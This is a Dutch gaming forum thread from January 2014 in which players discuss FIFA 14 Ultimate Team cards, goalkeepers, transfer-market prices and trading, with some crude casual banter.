quote:Op dinsdag 21 januari 2014 14:59 schreef DarkSonic2 het volgende:
Ik heb eindelijk een keer Jolley in een pack.. maar hij is niet eens 1.5k meer waard. Ook is hij best wel slecht gr gr
Linksmid is butje?quote:Op dinsdag 21 januari 2014 14:58 schreef Hoogstaande het volgende:
[..]
Die linksmid is butje en eigenlijk vielen alle Oostenrijkers me vies tegen. Villarreal wel een eindbaas![]()
Stats zijn prima. Workrates wat minder, maar verder lijkt het me echt een prima spieler.
Lazaro lijkt me de beste speler uit het team..hallo dus dit noemen ze nou twitter![]()
Wow, gaat dit voor jou echt nog om die 2k grap? Kort daarvoor maak jij een Britney Spears grapje. Dat is gewoon wat dollen, sjezus zeg wat laat jij je kennenquote:Op dinsdag 21 januari 2014 14:52 schreef PrideoftheSouth het volgende:
[..]
Lees terug. Het probleem is dat iemand doet alsof ik een kneusje ben omdat ik "maar 2k" pak op een deal. Sorry, niet voor iedereen groeien de bomen tot in de hemel.
Vervolgens valt hij me aan op dat ik bidders zou misleiden, terwijl je makkelijk een parallel kunt trekken naar zijn eigen tradegedrag. Maar als je dat zegt, weet hij niets beter te verzinnen dan een beetje eendimensionaal schelden, en irrelevante zaken erbij halen
Genoeg gezegd hierover, ik ga nog 50x 2k pakken
Het gaat er voor mij om dat jij mij hypocriet noemt met je totaal belachelijke drogredenering.
Ik zet kaarten op de markt voor een prijs die ik denk dat ze ooit waard worden, als mensen die kaart kopen krijgen ze precies wat ze wilden hebben voor precies de prijs die zij bereid waren om te betalen.
Een IF voor de prijs van de IF verkopen daarentegen is pure misleiding, je probeert mensen iets anders te laten kopen dan wat ze eigenlijk wilden hebben.
Totaal onvergelijkbaar. De enige overeenkomst is dat de kopers in beide gevallen dom zijn.![]()
quote:Op dinsdag 21 januari 2014 15:01 schreef DutchSL het volgende:
[..]
Wow, gaat dit voor jou echt nog om die 2k grap? Kort daarvoor maak jij een Britney Spears grapje. Dat is gewoon wat dollen, sjezus zeg wat laat jij je kennen
Het gaat er voor mij om dat jij mij hypocriet noemt met je totaal belachelijke drogredenering.
Ik zet kaarten op de markt voor een prijs die ik denk dat ze ooit waard worden, als mensen die kaart kopen krijgen precies wat ze wilden kopen voor precies de prijs die zij bereid zijn om te betalen.
Een IF voor de prijs van de IF verkopen daarentegen is pure misleiding, je probeert mensen iets anders te laten kopen dan wat ze eigenlijk wilden hebben.
Totaal onvergelijkbaar. De enige overeenkomst is dat de kopers in beide gevallen dom zijn.
hallo dus dit noemen ze nou twitter![]()
Maar je ontkent dus pertinent dat je ook wel een beeeetje gokt op mensen die je spelers voor SIF's oid aanzien en je daar gebruik van maakt?quote:Op dinsdag 21 januari 2014 15:01 schreef DutchSL het volgende:
[..]
Wow, gaat dit voor jou echt nog om die 2k grap? Kort daarvoor maak jij een Britney Spears grapje. Dat is gewoon wat dollen, sjezus zeg wat laat jij je kennen
Ik zet kaarten op de markt voor een prijs die ik denk dat ze ooit waard worden, als mensen die kaart kopen krijgen precies wat ze wilden kopen voor precies de prijs die zij bereid zijn om te betalen.
Totaal onvergelijkbaar. De enige overeenkomst is dat de kopers in beide gevallen dom zijn.![]()
Die LM (Grozurek) was vorig jaar wel een baasje maar Wernitznig is denk ik nog beter (want hij heeft 4*) Wel veel mindere passing.![]()
Ja, ik vond hem echt niet chill spelen. Lazaro was wel okee maar kwam niet echt uit de verf in mn team, maar Villarreal is wel echt veel beter. Ook 4* skills en gewoon heel erg soepel en scoort heel makkelijk.quote:Op dinsdag 21 januari 2014 15:00 schreef Lindgren. het volgende:
[..]
Linksmid is butje?![]()
[ afbeelding ]
Stats zijn prima. Workrates wat minder, maar verder lijkt het me echt een prima spieler.
Lazaro lijkt me de beste speler uit het team..Bringing them big boy toys, I do big boy things, I make big boy noise![]()
Wat een baas. Die gaat erin. Dacht dat Grozurek de beste optie was.quote:Op dinsdag 21 januari 2014 15:02 schreef DarkSonic2 het volgende:
Die LM (Grozurek) was vorig jaar wel een baasje maar Wernitznig is denk ik nog beter (want hij heeft 4*) Wel veel mindere passing.hallo dus dit noemen ze nou twitter![]()
Dit ook gewoon wetenquote:Op dinsdag 21 januari 2014 15:02 schreef DarkSonic2 het volgende:
Die LM (Grozurek) was vorig jaar wel een baasje maar Wernitznig is denk ik nog beter (want hij heeft 4*) Wel veel mindere passing.
Of zit je gewoon stats af te lezen op Wefut?
NAC Breda
Rèsbaarge![]()
Ja, dat ontken ik pertinent.quote:Op dinsdag 21 januari 2014 15:02 schreef Zhano het volgende:
[..]
Maar je ontkent dus pertinent dat je ook wel een beeeetje gokt op mensen die je spelers voor SIF's oid aanzien en je daar gebruik van maakt?
Hell, als ik een IF heb waar een SIF voor komt dan dump ik die kaart zo snel mogelijk. Ik heb mijn IF Cabaye's dit weekend verkocht voor 35k (een normale prijs) en toen Benatia 2x scoorde heb ik mijn IF Benatia zsm weg gegdaan.![]()
Ik had beide vorig jaar en ik weet niet zeker of Wernitznig nog 4* heeft.quote:Op dinsdag 21 januari 2014 15:04 schreef PrideoftheSouth het volgende:
[..]
Dit ook gewoon weten
Of zit je gewoon stats af te lezen op Wefut?![]()
okquote:Op dinsdag 21 januari 2014 15:04 schreef DutchSL het volgende:
[..]
Ja, dat ontken ik pertinent.
Hell, als ik een IF heb waar een SIF voor komt dan dump ik die kaart zo snel mogelijk. Ik heb mijn IF Cabaye's dit weekend verkocht voor 35k (een normale prijs) en toen Benatia 2x scoorde heb ik mijn IF Benatia zsm weg gegdaan.![]()
![]()
Zometeen voor het eerst bronze packs openen op een account met een TP van 100Ik snap nog steeds niet waarom ik op 1 account wel een TP van 100 heb en op een andere niet maar dat terzijde.
![]()
Ah. Nu snap ik waarom je me uitscheldt. Argument prima onderbouwd. Case closed.quote:Op dinsdag 21 januari 2014 15:01 schreef DutchSL het volgende:
[..]
Ik zet kaarten op de markt voor een prijs die ik denk dat ze ooit waard worden, als mensen die kaart kopen krijgen ze precies wat ze wilden hebben voor precies de prijs die zij bereid waren om te betalen.
Totaal onvergelijkbaar. De enige overeenkomst is dat de kopers in beide gevallen dom zijn.
NAC Breda
Rèsbaarge![]()
Ik had er ook nog nooit van gehoord, maar wel van die racistische zwarte cabaretier die heel veel volgelingen heeft (het moet niet gekker worden).quote:Op dinsdag 21 januari 2014 15:12 schreef PrideoftheSouth het volgende:
http://www.nu.nl/sport/36(...)emitisch-gebaar.html
Nog nooit van dat gebaar gehoordBringing them big boy toys, I do big boy things, I make big boy noise![]()
Tot nu had ik hem nog nooit gezienquote:Op dinsdag 21 januari 2014 15:14 schreef Zhano het volgende:
[ afbeelding ]
Lindgren. deze MOET je hebben!![]()
![]()
Op PS3 is de prijs al verdubbeldquote:Op dinsdag 21 januari 2014 15:14 schreef DarkSonic2 het volgende:
De prijzen zijn nog steeds best wel laag.. 3k voor een speler als Ilori.Nu maar hopen op een prijsstijging.
maar op Xbox is die nooit zo laag geweest blijkbaar.
![]()
Voor al uw hand- en spandienstenquote:Op dinsdag 21 januari 2014 15:14 schreef Zhano het volgende:
[ afbeelding ]
Lindgren. deze MOET je hebben!
NAC Breda
Rèsbaarge![]()
Ik had 1 voor 2.6k en 1 voor 3.2k met anchor.. die laatste is sowieso wel meer waard, ik heb gemerkt dat mensen soms niet goed op de chem styles lettenquote:Op dinsdag 21 januari 2014 15:16 schreef DutchSL het volgende:
[..]
Op PS3 is de prijs al verdubbeldmaar op Xbox is die nooit zo laag geweest blijkbaar.
![]()
![]()
Beste bronze waarmee ik heb gespeeld is:
http://www.futhead.com/14/players/2269/morten-moldskred/
Eindbaas![]()
![]()
Seamus Coleman naar 10k. Zul je zien dat iedereen straks zo massaal Ieren heeft ingeslagen en ze allemaal gaat aanbieden rond St. Trackpik's Day, dat de prijzen dan gaan dalen
NAC Breda
Rèsbaarge![]()
Was ook interesse voor hem van ManU.quote:Op dinsdag 21 januari 2014 15:19 schreef PrideoftheSouth het volgende:
Seamus Coleman naar 10k. Zul je zien dat iedereen straks zo massaal Ieren heeft ingeslagen en ze allemaal gaat aanbieden op St. Trakpick's Day, dat de prijzen dan gaan dalen![]()
Eensch. Samen met mjelde danquote:Op dinsdag 21 januari 2014 15:19 schreef Quasi-intellectueel het volgende:
[ afbeelding ]
Eindbaas![]()
![]()
Hij krijgt sowieso ook een UP naar gold. Ik ben ook wel benieuwd naar de prijs van de IF tijdens St. Patsquote:Op dinsdag 21 januari 2014 15:19 schreef PrideoftheSouth het volgende:
Seamus Coleman naar 10k. Zul je zien dat iedereen straks zo massaal Ieren heeft ingeslagen en ze allemaal gaat aanbieden op St. Trakpick's Day, dat de prijzen dan gaan dalen![]()
![]()
Ja, maar als je meer dan 2k winst wil pakken, moet je het gewoon goed doen.quote:Op dinsdag 21 januari 2014 15:19 schreef PrideoftheSouth het volgende:
Seamus Coleman naar 10k. Zul je zien dat iedereen straks zo massaal Ieren heeft ingeslagen en ze allemaal gaat aanbieden rond St. Trackpik's Day, dat de prijzen dan gaan dalen
"Ik vind Marcellis wel zo iemand die er op zijn 28e achter komt dat hij eigenlijk linksbenig is." - Tim86
"Marcellis legt ze zo op de stropdas. Mits ze een stropdas van 8 meter aan zouden hebben." - Toefjes
kortom:![]()
Inderdaad, dat wordt een dure. Maar ik denk dat een NIF ook prima speeltquote:Op dinsdag 21 januari 2014 15:20 schreef DarkSonic2 het volgende:
[..]
Hij krijgt sowieso ook een UP naar gold. Ik ben ook wel benieuwd naar de prijs van de IF tijdens St. Pats
NAC Breda
Rèsbaarge![]()
Die had ik ook ja in een Norwegen-USA hybrid. Veel Noorse bazen zaten daar in: Mjelde, een neger-CDM, Ronning (CB), Kristiansen (LB).quote:Op dinsdag 21 januari 2014 15:19 schreef Quasi-intellectueel het volgende:
[ afbeelding ]
Eindbaas
Maar ik vind bronzes niet zoveel aan dit jaar.![]()
FUT11 Tippeligaen Bronze <3quote:Op dinsdag 21 januari 2014 15:21 schreef Quasi-intellectueel het volgende:
[..]
Sowieso Tippeligaen bronze team![]()
![]()
Looks nice, kan ook mooi met linksvoetig op rechts en andersom...maar of het in de praktijk ook werkt...quote:Op dinsdag 21 januari 2014 15:22 schreef Grandesco het volgende:
[ afbeelding ]
Kon het niet laten....
Heb het maar gebouwd... Straks kijken of het wat is.
Daarnaast vraag ik me echt af of Dos Santos niet wat te zwak is.NAC Breda
Rèsbaarge![]()
Opgepikt voor 350c, volgende BIN is 950cquote:Op dinsdag 21 januari 2014 15:22 schreef DarkSonic2 het volgende:
Rogic terug naar Australië namelijk naar Melb. Victory (loan)![]()
![]()
Er zijn ook mensen die Neymar in de spits hebben en die is nog zwakker...quote:Op dinsdag 21 januari 2014 15:26 schreef PrideoftheSouth het volgende:
[..]
Looks nice, kan ook mooi met linksvoetig op rechts en andersom...maar of het in de praktijk ook werkt...
Daarnaast vraag ik me echt af of Dos Santos niet wat te zwak is.
Ach, we zien het wel. Kostte ook niet echt zo veel. 70k![]()
![]()
Alles met Kat is het beste.quote:Op dinsdag 21 januari 2014 15:30 schreef Maver24 het volgende:
[..]
is Courtois nou beter dan Julio Cesar ?![]()
Sowieso.quote:Op dinsdag 21 januari 2014 15:30 schreef Maver24 het volgende:
[..]
is Courtois nou beter dan Julio Cesar ?NAC Breda
Rèsbaarge![]()
Op zich wil ik nu wel weer een bronze team maken. Wat pakjes kopen voor contracten en gaan. Easy doekoe.![]()
![]()
Courtois vind ik de beste keeper die ik heb gehad.quote:Op dinsdag 21 januari 2014 15:30 schreef Maver24 het volgende:
[..]
is Courtois nou beter dan Julio Cesar ?
Julio Cesar is niet eens de beste Braziliaanse keeper imo![]()
Waarom is die zo duur? Kan die ook naar Man Utd?quote:Op dinsdag 21 januari 2014 15:33 schreef DarkSonic2 het volgende:
Had ik maar heel vaak Willems gekocht toen ik hem voor 1.2k of minder op kon pikken.. nu kost hij alweer 2.5k.NAC Breda
Rèsbaarge![]()
4* LB. Volgens mij is hij op de PS3/PS4 1 van de duurste non-shiny spelers.quote:Op dinsdag 21 januari 2014 15:35 schreef PrideoftheSouth het volgende:
[..]
Waarom is die zo duur? Kan die ook naar Man Utd?
Dit lijkt me wel een goede bronze CB: http://wefut.com/en/player/4304 Hij kan zelfs passen.![]()
iemand van jullie wel eens deze fifa met Ronaldo gespeeld. die moet ik steeds proberen dit jaar. lijkt me wel heel erg goed. wordt dan wel de NIF versie want dat is de enige die ik kan betalen op het moment![]()
Jefferson is de beste braziliaanse keeperquote:Op dinsdag 21 januari 2014 15:32 schreef DutchSL het volgende:
[..]
Courtois vind ik de beste keeper die ik heb gehad.
Julio Cesar is niet eens de beste Braziliaanse keeper imo![]()
IF Diego Alves is ook goed voor sommige mensen maar voor mij was die aids.![]()
Er valt hier iemand van zijn voetstukquote:Op dinsdag 21 januari 2014 15:37 schreef Maver24 het volgende:
iemand van jullie wel eens deze fifa met Ronaldo gespeeld. die moet ik steeds proberen dit jaar. lijkt me wel heel erg goed. wordt dan wel de NIF versie want dat is de enige die ik kan betalen op het moment
NAC Breda
Rèsbaarge![]()
Jefferson is echt irritant, die vent stopt tegen mij altijd alles. Net als Howard.quote:Op dinsdag 21 januari 2014 15:39 schreef Grandesco het volgende:
[..]
Jefferson is de beste braziliaanse keeper![]()
IF Diego Alves is ook goed voor sommige mensen maar voor mij was die aids.![]()
![]()
Blunderkoning Helton vind jij een goede keepert?quote:Op dinsdag 21 januari 2014 15:40 schreef DutchSL het volgende:
Jefferson niet gehad, maar ik vind Helton ook een baas.![]()
![]()
ik heb met de toty gebeuren teveel coins kwijtgespeelt, ongeveer 900k aan packs geopend. anders had ik wel een stuk meer coins gehad en had ik de 93 of zelfs 94 versie kunnen halenquote:Op dinsdag 21 januari 2014 15:40 schreef PrideoftheSouth het volgende:
[..]
Er valt hier iemand van zijn voetstuk![]()
Bij mij stopt hij alles, inclusief voorzetten wat 99% van de keepers in Fut niet lukt.quote:Op dinsdag 21 januari 2014 15:40 schreef Quasi-intellectueel het volgende:
[..]
Jefferson is echt irritant, die vent stopt tegen mij altijd alles. Net als Howard.![]()
Tja...je kan ook niet altijd geluk hebbenquote:Op dinsdag 21 januari 2014 15:42 schreef Maver24 het volgende:
[..]
ik heb met de toty gebeuren teveel coins kwijtgespeelt, ongeveer 900k aan packs geopend. anders had ik wel een stuk meer coins gehad en had ik de 93 of zelfs 94 versie kunnen halen
NAC Breda
Rèsbaarge![]()
Helton, de man die niet kan klemmenquote:Op dinsdag 21 januari 2014 15:42 schreef Zhano het volgende:
[..]
Blunderkoning Helton vind jij een goede keepert?![]()
![]()
Alleen zo jammer dat hij bijna alleen gebruikt wordt door tegenstanders met een 100% Brazil squad
NAC Breda
Rèsbaarge![]()
Ja, deed het heel goed voor mij in wat verder een kut team was met Mangala voor hem (die viel dan weer vies tegen).quote:Op dinsdag 21 januari 2014 15:42 schreef Zhano het volgende:
[..]
Blunderkoning Helton vind jij een goede keepert?
In FUT 12 was "iedereen" ook zo negatief over hem, terwijl ik maanden prima ervaring met hem had.![]()
Mangala vind ik dan weer een baasquote:Op dinsdag 21 januari 2014 15:46 schreef DutchSL het volgende:
[..]
Ja, deed het heel goed voor mij in wat verder een kut team was met Mangala voor hem (die viel dan weer vies tegen).
In FUT 12 was "iedereen" ook zo negatief over hem, terwijl ik maanden prima ervaring met hem had.![]()
![]()
Iedereen zat ook te zeiken over Nilmar terwijl het gewoon een baas was,quote:Op dinsdag 21 januari 2014 15:46 schreef DutchSL het volgende:
[..]
Ja, deed het heel goed voor mij in wat verder een kut team was met Mangala voor hem (die viel dan weer vies tegen).
In FUT 12 was "iedereen" ook zo negatief over hem, terwijl ik maanden prima ervaring met hem had.Rock you in your face and stab your brain with your nosebone![]()
Handanovic is ook zo raar, die deed het heel slecht voor mij, maar de meesten zijn er positief over.
En TOTY Neuer heeft in een handvol wedstrijden meer blunders gemacht dan Adler in in een stuk of 30, en dan vind ik Adler zelf ook niet zo heel erg geweldig.![]()
Dos Santos en Vela moet je echt omdraaienquote:Op dinsdag 21 januari 2014 15:22 schreef Grandesco het volgende:
[ afbeelding ]
Kon het niet laten....
Heb het maar gebouwd... Straks kijken of het wat is.SIF Dos Santos is op Cam echt heel goed
Dit is de leven en ik weet dat dit de leven is. En ik weet niet of het nog lang duurt. Maar zolang het er nog even is, geniet ik ervan.
Elke dag![]()
Handanovic vond ik ook heel erg goed, maar Neuer, gewoon de NIF, is echt bij far de beste keeper die ik gehad heb dit jaar, inclusief Casillas.quote:Op dinsdag 21 januari 2014 15:48 schreef DutchSL het volgende:
Handanovic is ook zo raar, die deed het heel slecht voor mij, maar de meesten zijn er positief over.
En TOTY Neuer heeft in een handvol wedstrijden meer blunders gemacht dan Adler in in een stuk of 30, en dan vind ik Adler zelf ook niet zo heel erg geweldig.
Enige rare is dat hij 91 kicking heeft maar dat ie dat echt voor geen meter kan bij mij L:PBringing them big boy toys, I do big boy things, I make big boy noise![]()
Ronaldo gaat dit jaar niet meer weg uit mijn team ;-)
Je moet hem eigenlijk wel als LF gebruiken imoGRAAG VERWIJDEREN![]()
Timmyquote:Op dinsdag 21 januari 2014 15:48 schreef Timmy_Turner het volgende:
[..]
Dos Santos en Vela moet je echt omdraaienSIF Dos Santos is op Cam echt heel goed
NAC Breda
Rèsbaarge![]()
Gebruik je wel het juiste knopje?quote:Op dinsdag 21 januari 2014 15:49 schreef Hoogstaande het volgende:
En TOTY Neuer heeft in een handvol wedstrijden meer blunders gemacht dan Adler in in een stuk of 30, en dan vind ik Adler zelf ook niet zo heel erg geweldig.en niet
Nee, want 2* weak foot in de spits is echt aids.quote:Op dinsdag 21 januari 2014 15:48 schreef Timmy_Turner het volgende:
[..]
Dos Santos en Vela moet je echt omdraaienSIF Dos Santos is op Cam echt heel goed
![]()
Handanovic is de beste Serie A-keeper voor mij tot nu toe. Buffon nog niet geprobeerd trouwens.quote:Op dinsdag 21 januari 2014 15:48 schreef DutchSL het volgende:
En TOTY Neuer heeft in een handvol wedstrijden meer blunders gemacht dan Adler in in een stuk of 30, en dan vind ik Adler zelf ook niet zo heel erg geweldig.NAC Breda
Rèsbaarge![]()
Ja, ik wilde NIF Neuer halen tot ik dacht TOTY Neuer is best goedkoop laat ik hem nemen, die gaat toch alleen maar stijgen.quote:Op dinsdag 21 januari 2014 15:49 schreef Hoogstaande het volgende:
[..]
Handanovic vond ik ook heel erg goed, maar Neuer, gewoon de NIF, is echt bij far de beste keeper die ik gehad heb dit jaar, inclusief Casillas.
Enige rare is dat hij 91 kicking heeft maar dat ie dat echt voor geen meter kan bij mij L:P
Nu is NIF Neuer al 75k, veel duurder dan hij voor de TOTY crash wasdus dat gaat hem niet worden.
![]()
Merk je helemaal niet veel van. En dat is op Cam dan helemaal want dan kan je of geen voorzetten geven of niet naar binnenkomen. In de spits kan hij altijd nog met andere been schietenquote:Op dinsdag 21 januari 2014 15:50 schreef Grandesco het volgende:
[..]
Nee, want 2* weak foot in de spits is echt aids.Dit is de leven en ik weet dat dit de leven is. En ik weet niet of het nog lang duurt. Maar zolang het er nog even is, geniet ik ervan.
Elke dag![]()
Uiteraard.quote:Op dinsdag 21 januari 2014 15:49 schreef MrvanTrapZ het volgende:
[..]
Gebruik je wel het juiste knopje?
[ afbeelding ]
Niet alleen terugspeel ballen schiet ie slecht weg, ook uittrappen
quote:
Dit is de leven en ik weet dat dit de leven is. En ik weet niet of het nog lang duurt. Maar zolang het er nog even is, geniet ik ervan.
Elke dag![]()
Beste keeper voor mij is nog altijd Cech.quote:Op dinsdag 21 januari 2014 15:51 schreef Hoogstaande het volgende:
[..]
Uiteraard.
Niet alleen terugspeel ballen schiet ie slecht weg, ook uittrappen
Andere nachtmerrie van Ozz.Rock you in your face and stab your brain with your nosebone![]()
Topquote:Op dinsdag 21 januari 2014 15:51 schreef PrideoftheSouth het volgende:
[..]
How's life?
Speel jij nog?
Heb nu me eigen appartementje, studie gaat toppiejoppie en verdere sociale leven ook super![]()
Ja ben weer begonnen, heb nu goed internet en dan begint het toch wel te kriebelen om weer ff te fifaenEn heb een nieuwe baan naast studie waarvoor ik veel op pc moet zitten dus dan kom ik hier weer weleens kijken
En bij jou? Hoe is het met de kleine?Dit is de leven en ik weet dat dit de leven is. En ik weet niet of het nog lang duurt. Maar zolang het er nog even is, geniet ik ervan.
Elke dag![]()
Lloris vergeten trouwens, die viel me ook zwaar tegen.
Voor golds:
Mijn goede keepers:
1. Courtois
2. Marchetti
3. Sirigu
4. Pepe Reina
5. Helton
Mijn tegenvallende keepers:
1. TOTY Neuer
2. Lloris
3. Handanovic
4. Adler
5. Diego Lopez
En angstgegners zijn Cech en IF Howard, die houden altijd gigantisch veel tegen.![]()
Die was gewoon smerig...quote:Op dinsdag 21 januari 2014 15:46 schreef MrvanTrapZ het volgende:
[..]
Iedereen zat ook te zeiken over Nilmar terwijl het gewoon een baas was,![]()
Lloris is wel goed alleen hij kan niet uittrappen met zijn weakfoot.quote:Op dinsdag 21 januari 2014 15:54 schreef DutchSL het volgende:
Lloris vergeten trouwens, die viel me ook zwaar tegen.
Voor golds:
Mijn goede keepers:
1. Courtois
2. Marchetti
3. Sirigu
4. Pepe Reina
5. Helton
Mijn tegenvallende keepers:
1. TOTY Neuer
2. Lloris
3. Handanovic
4. Adler
5. Diego Lopez
En angstgegners zijn Cech en IF Howard, die houden altijd gigantisch veel tegen.![]()
Goed bezig hoorquote:Op dinsdag 21 januari 2014 15:53 schreef Timmy_Turner het volgende:
[..]
Heb nu me eigen appartementje, studie gaat toppiejoppie en verdere sociale leven ook super![]()
Ja ben weer begonnen, heb nu goed internet en dan begint het toch wel te kriebelen om weer ff te fifaenEn heb een nieuwe baan naast studie waarvoor ik veel op pc moet zitten dus dan kom ik hier weer weleens kijken
En bij jou? Hoe is het met de kleine?Wat voor werk heb je?
En hoe gaat het met het meissie?
Met mij alles goed, beetje troubles met vaart in mijn scriptie houden, maar werk en prive gaat prima
Kleine gaat geweldig, groeit goed, eet goed, huilt niet vaak maar als hij huilt hoort de hele buurt het. Een echte POTS in spe
NAC Breda
Rèsbaarge![]()
Ik vind Mignolet ook echt heel fijn. Heb nog geen moment overwogen een duurder alternatief te nemen. IF Howard ook even op doel gehad, maar toch weer terug gestapt op Mignoletquote:
NAC Breda
Rèsbaarge![]()
Hoezo? Pace, 4* skill en weakfoot en finishingquote:
Kan er niet teveel over zeggen, maar ik maak simulaties van real-life events. Heel interessant werk en je leert er ook veel van. Gaat ook superquote:Op dinsdag 21 januari 2014 15:56 schreef PrideoftheSouth het volgende:
[..]
Goed bezig hoorWat voor werk heb je?
En hoe gaat het met het meissie?
Met mij alles goed, beetje troubles met vaart in mijn scriptie houden, maar werk en prive gaat prima
Kleine gaat geweldig, groeit goed, eet goed, huilt niet vaak maar als hij huilt hoort de hele buurt het. Een echte POTS in spe![]()
Haha wanneer is je deadline? Fijn dat het goed gaat, wat minder met je UI
Fijn om te horenEn ja, hoort de hele buurt jou ook als je verliest met Fut
?
Elke dag
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |